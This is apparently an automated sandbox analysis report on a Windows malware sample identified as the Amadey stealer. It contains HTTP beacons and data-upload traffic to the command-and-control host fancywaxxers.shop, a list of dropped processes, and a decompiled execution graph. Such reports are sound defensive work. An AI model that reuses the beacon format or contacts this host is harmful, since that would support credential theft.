                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 31 30 49 32 4a 50 44 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                              Data Ascii: --10I2JPD0IContent-Disposition: form-data; name="hwid"BC5F8DB9D76125D420A4C476FD51BCB1--10I2JPD0IContent-Disposition: form-data; name="pid"1--10I2JPD0IContent-Disposition: form-data; name="lid"PsFKDg--pablo--10I2JPD0IContent-Disp
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88 dd 55 5a 12 49 12 fd 8a d0 04 03 e6 c7 0a b3 68 b5 7d 48 d2 3f 90 1d ad aa 72 80 fd 04 b7 92 a2 3e b9 79 73 1c d7 27 b6 a6
                                                                                                              Data Ascii: 0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=UZIh}H?r>ys'
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2 99 e3 20 d4 eb 57 61 7d dd 3b c1 a9 0f 18 20 f9 55 18 2b 14 4f a3 d3 6e 15 42 e3 24 e8 3b b9 5d 50 e1 5f a9 f1 ff 0a 1e cf
                                                                                                              Data Ascii: <z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8} Wa}; U+OnB$;]P_
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40 39 fc ed 68 84 10 10 10 86 fd 6f 67 71 91 5a 81 1d 3a db c3 50 97 b7 c0 fe a8 a9 1e e8 fe 61 4d e6 a8 41 d7 5e d2 59 40 ac
                                                                                                              Data Ascii: s"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@9hogqZ:PaMA^Y@
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b ad 11 47 87 6f f1 17 05 8d a3 0b df 79 25 14 3a c4 ad cc e8 29 d0 3a 0f bb 40 c4 77 d2 a7 52 82 af 2d 54 69 12 e3 36 ae f5
                                                                                                              Data Ascii: -WjZ+kq*<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw*) Vr7!Goy%:):@wR-Ti6
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a 71 16 90 f3 f0 57 52 05 e8 ed a1 9f f5 c1 bb 46 e3 1d a7 6c 3e 7c 7b e1 41 c4 20 df ee 21 92 e3 11 5b 1d 3e 74 2b 93 2c 74
                                                                                                              Data Ascii: vvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp|bhx}lCd@T4qWRFl>|{A ![>t+,t
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b 7a ab fd 31 c9 a3 76 da bd ee a0 88 9f 16 f2 1c e1 c3 11 55 d1 3f ae 61 bb 6f 26 8e f6 fb 18 a4 cd 7c 5c 0c b8 dd 76 e8 85
                                                                                                              Data Ascii: ZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}o*e*PWzz1vU?ao&|\v
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5 bd 8c fd bc 73 e4 cd 93 eb 79 e0 58 0f 7d 82 e7 9d f0 23 45 9b a9 85 fc 36 45 90 32 cf 7f 09 b8 15 87 0e 90 e2 90 78 a6 fd
                                                                                                              Data Ascii: jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe|n`'G'D$xRQS4mN|u0k]%LN@Oj|W1|i1d ]w_e9^+$QD7#%syX}#E6E2x
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a 2a 39 59 57 c7 7e ca ba b7 2c a9 cb b7 87 05 f5 67 ed 07 de 0f b0 e6 1d 91 37 af 0a a9 fe ef 90 d3 0b 75 a6 94 59 dd ff 99
                                                                                                              Data Ascii: w0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj*9YW~,g7uY
                                                                                                              2024-12-31 08:48:36 UTC15331OUTData Raw: be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b 64 ec 71 f8 df 71 b1 ce 6d 60 5a 16 21 08 9c 9c 1e 4b 94 be 3c a5 0a 24 57 b7 89 1c bc 1d a6 a6 53 d1 64 55 f3 e9 91 a9 68
                                                                                                              Data Ascii: j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4dqqm`Z!K<$WSdUh
                                                                                                              2024-12-31 08:48:38 UTC1139INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:38 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=cupns8t37qkls3f6apf2l57thl; expires=Sat, 26 Apr 2025 02:35:16 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvE2t%2FROSEyqTGFDS9cUQqVtxnNEnraX%2B7e97hIgeB8Yq1cpP5CGTRLiRjhOqgNJ9wE4IlBi1ucUJzN0Yh7b0mr0lPV1jvJDoUN%2F14waUc51hoqcXttMmY0RtlSML%2FCI3iWIgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa902f4bc460f5b-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1660&rtt_var=634&sent=371&recv=590&lost=0&retrans=0&sent_bytes=2842&recv_bytes=574709&delivery_rate=1710603&cwnd=221&unsent_bytes=0&cid=0ee0d4a77adb896d&ts=1573&x=0"


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.649742104.21.112.14436248C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 08:48:38 UTC265OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 82
                                                                                                              Host: fancywaxxers.shop
                                                                                                              2024-12-31 08:48:38 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=BC5F8DB9D76125D420A4C476FD51BCB1
                                                                                                              2024-12-31 08:48:39 UTC1127INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 08:48:38 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=ipqurao33pk30n5k88p33uft3n; expires=Sat, 26 Apr 2025 02:35:17 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uD7l2WiN639J05z7S6g4m6QwK73SWFkFLZtc0eWkFvdha0LXSYf3FRKc8CiZ1PBGYSv%2FfBvdcwoLzLdHrnLUe0PrUznH3rxXcJLt9b2F3fZ%2Bq9T0QfAyH80PXI6YLZsqqDBYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fa90301bff9c34f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1446&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=983&delivery_rate=1913499&cwnd=181&unsent_bytes=0&cid=19268dba855d4fde&ts=452&x=0"
                                                                                                              2024-12-31 08:48:39 UTC222INData Raw: 64 38 0d 0a 77 61 62 62 56 67 4e 64 31 2b 49 45 75 34 50 30 58 4e 6f 6b 2b 45 72 54 61 54 71 48 68 6b 65 65 48 50 74 76 43 42 6b 63 7a 56 2b 61 33 66 6b 6a 49 57 66 31 69 6e 44 50 38 38 34 41 39 58 6a 58 65 2b 74 63 46 4c 57 33 63 72 41 74 79 6c 77 6d 4b 43 71 52 63 4c 4c 53 76 6a 64 75 41 66 69 51 5a 64 58 6e 6d 7a 48 30 51 59 41 76 38 55 55 59 34 66 4a 6c 70 43 7a 58 54 57 30 37 4a 76 30 69 37 64 33 35 49 79 46 6e 39 59 70 77 7a 2f 50 4f 41 50 56 34 31 33 76 72 58 42 53 31 74 33 4b 77 4c 63 70 63 4a 69 67 71 6b 58 43 73 7a 37 55 7a 58 33 4b 6c 67 32 72 66 37 4a 6c 79 76 31 79 64 61 50 39 4c 58 50 4f 6b 66 61 34 77 32 51 6f 71 49 79 79 77 41 67 3d 3d 0d 0a
                                                                                                              Data Ascii: d8wabbVgNd1+IEu4P0XNok+ErTaTqHhkeeHPtvCBkczV+a3fkjIWf1inDP884A9XjXe+tcFLW3crAtylwmKCqRcLLSvjduAfiQZdXnmzH0QYAv8UUY4fJlpCzXTW07Jv0i7d35IyFn9Ypwz/POAPV413vrXBS1t3KwLcpcJigqkXCsz7UzX3Klg2rf7Jlyv1ydaP9LXPOkfa4w2QoqIyywAg==
                                                                                                              2024-12-31 08:48:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:03:48:25
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Dl6wuWiQdg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Dl6wuWiQdg.exe"
                                                                                                              Imagebase:0xd90000
                                                                                                              File size:1'868'288 bytes
                                                                                                              MD5 hash:B71B7AEDBA64DFAC7FB62B18FE22E956
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:03:48:43
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe"
                                                                                                              Imagebase:0xd50000
                                                                                                              File size:3'243'520 bytes
                                                                                                              MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:03:48:46
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                              Imagebase:0x780000
                                                                                                              File size:3'243'520 bytes
                                                                                                              MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:03:48:47
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              Imagebase:0x780000
                                                                                                              File size:3'243'520 bytes
                                                                                                              MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:9
                                                                                                              Start time:03:49:00
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              Imagebase:0x780000
                                                                                                              File size:3'243'520 bytes
                                                                                                              MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.8%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:10.9%
                                                                                                                Total number of Nodes:649
                                                                                                                Total number of Limit Nodes:23
                                                                                                                execution_graph 11719 d687d0 11720 d6882a ___std_exception_copy 11719->11720 11726 d69bb0 11720->11726 11724 d6886c std::invalid_argument::invalid_argument 11725 d688d9 std::_Throw_future_error 11736 d69ef0 11726->11736 11728 d69be5 11740 d52ce0 11728->11740 11730 d69c16 11746 d69f70 11730->11746 11732 d68854 11732->11724 11733 d543f0 11732->11733 11734 d6bedf InitOnceExecuteOnce 11733->11734 11735 d5440a 11734->11735 11735->11725 11737 d69f0c 11736->11737 11738 d6c68b __Mtx_init_in_situ 2 API calls 11737->11738 11739 d69f17 11738->11739 11739->11728 11741 d52d1d 11740->11741 11742 d6bedf InitOnceExecuteOnce 11741->11742 11743 d52d46 11742->11743 11744 d52d51 std::invalid_argument::invalid_argument 11743->11744 11751 d6bef7 11743->11751 11744->11730 11747 d69fef shared_ptr 11746->11747 11749 d6a058 11747->11749 11761 d6a210 11747->11761 11750 d6a03b 11750->11732 11752 d6bf03 std::_Throw_future_error 11751->11752 11753 d6bf73 11752->11753 11754 d6bf6a 11752->11754 11755 d52ae0 InitOnceExecuteOnce 11753->11755 11758 d6be7f 11754->11758 11757 d6bf6f 11755->11757 11757->11744 11759 d6cc31 InitOnceExecuteOnce 11758->11759 11760 d6be97 11759->11760 11760->11757 11762 d6a290 11761->11762 11768 d671d0 11762->11768 11764 d6a2cc shared_ptr 11765 d53ee0 3 API calls 11764->11765 11766 d6a4be shared_ptr 11764->11766 11767 d6a4a6 11765->11767 11766->11750 11767->11750 11769 d67211 11768->11769 11776 d53970 11769->11776 11771 d67446 std::invalid_argument::invalid_argument 11771->11764 11772 d672ad ___std_exception_copy 11772->11771 11773 d6c68b __Mtx_init_in_situ 2 API calls 11772->11773 11774 d67401 11773->11774 11781 d52ec0 11774->11781 11777 d6c68b __Mtx_init_in_situ 2 API calls 11776->11777 11778 d539a7 11777->11778 11779 d6c68b __Mtx_init_in_situ 2 API calls 11778->11779 11780 d539e6 11779->11780 11780->11772 11782 d52f06 11781->11782 11783 d52f7e GetCurrentThreadId 11781->11783 11786 d6c6ac GetSystemTimePreciseAsFileTime 11782->11786 11784 d52f94 11783->11784 11785 d52fef 11783->11785 11784->11785 11791 d6c6ac GetSystemTimePreciseAsFileTime 11784->11791 11785->11771 11787 d52f12 11786->11787 11788 d5301e 11787->11788 11792 d52f1d __Mtx_unlock 11787->11792 11789 d6c26a 4 API calls 11788->11789 11790 d53024 11789->11790 11793 d6c26a 4 API calls 11790->11793 11794 d52fb9 11791->11794 11792->11790 11795 d52f6f 11792->11795 11793->11794 11796 d6c26a 4 API calls 11794->11796 11797 d52fc0 __Mtx_unlock 11794->11797 11795->11783 11795->11785 11796->11797 11798 d6c26a 4 API calls 11797->11798 11799 d52fd8 __Cnd_broadcast 11797->11799 11798->11799 11799->11785 11800 d6c26a 4 API calls 11799->11800 11801 d5303c 11800->11801 11802 d6c6ac GetSystemTimePreciseAsFileTime 11801->11802 11810 d53080 shared_ptr __Mtx_unlock 11802->11810 11803 d531c5 11804 d6c26a 4 API calls 11803->11804 11805 d531cb 11804->11805 11806 d6c26a 4 API calls 11805->11806 11807 d531d1 11806->11807 11808 d6c26a 4 API calls 11807->11808 11816 d53193 __Mtx_unlock 11808->11816 11809 d531a7 std::invalid_argument::invalid_argument 11809->11771 11810->11803 11810->11805 11810->11809 11813 d53132 GetCurrentThreadId 11810->11813 11811 d6c26a 4 API calls 11812 d531dd 11811->11812 11813->11809 11814 